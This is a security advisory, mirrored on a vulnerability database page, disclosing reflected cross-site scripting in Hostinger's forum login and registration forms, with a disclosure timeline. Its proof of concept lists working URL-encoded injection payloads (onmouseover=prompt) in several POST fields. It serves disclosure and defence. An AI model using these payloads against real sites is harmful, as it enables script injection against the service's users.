Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hostinger Web Hosting Cross Site Scripting

🗓️ 17 Jun 2013 00:00:00Reported by Juan Carlos GarciaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

Hostinger Web Hosting Multiple Cross Site Scripting, 2013-06-01: Researcher Notification, 2013-06-13: Not Fixed, /forum/login, /forum/register, URL encoded POST input, onmouseover=prompt(952323) ba

Code
`Hostinger Web Hosting Multiple Cross Site Scripting  
  
  
Report-Timeline:  
================  
2013-06-01: Researcher Notification   
2013-06-03: RESPONSE  
2013-06-07: Ask About the issues  
2013-06-10: Vendor Feedback  
2013-06-13: Not Fixed  
2013-06-16: Full Disclosure  
  
  
I-VULNERABILITY  
-------------------------  
#Title: Hostinger Web Hosting Multiple Cross Site Scripting  
  
#Vendor:http://www.hostinger.es  
  
#Author:Juan Carlos García (@secnight)  
  
#Follow me   
http://www.highsec.es  
HTTP://WWW.radio3w.com  
http://hackingmadrid.blogspot.com  
http://blogs.0verl0ad.com  
Twitter:@secnight  
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn  
  
  
II-Introduction:  
=============  
Hostinger® is a free and affordable premium web hosting services provider and domain registrar.  
  
Hostinger has grown from a small web hosting provider into a world leading and industry recognized   
  
web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community.  
  
Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil,  
  
Argentina, Mexico, Columbia, Russia, Ukraine, and many more countries on their way!  
-------------------------  
  
III-PROOF OF CONCEPT  
=============  
  
Affected items  
  
/forum/login (5)  
/forum/register (8)  
  
Attack details  
  
/forum/login   
=============  
  
URL encoded POST input email was set to " onmouseover=prompt(952323) bad="  
The input is reflected inside a tag element between double quotes.  
  
POST /forum/login HTTP/1.1  
  
email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1  
  
VARIANTS  
  
email 2  
-------  
  
email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1  
  
email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight  
  
  
pass 3  
-------  
  
[email protected]&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1  
  
[email protected]&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22  
  
email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1  
  
  
/forum/register.   
=============  
  
URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad="  
  
The input is reflected inside a tag element between double quotes.  
  
POST /forum/register HTTP/1.1  
  
confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&[email protected]&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal  
  
  
VARIANTS  
----------  
----------  
  
confirmPass 2  
-------------  
  
confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&[email protected]&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
  
email 2  
--------  
  
confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
Name 2  
-------  
confirmPass=secnight&[email protected]&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
  
pass 2  
-------  
  
confirmPass=secnight&[email protected]&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge  
  
  
IV. CREDITS  
-------------------------  
  
This vulnerability has been discovered  
by Juan Carlos García(@secnight)  
  
  
V. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jun 2013 00:00Current
cross site scriptingvendor notificationvulnerability detailsforum loginforum registerhttp protocol
46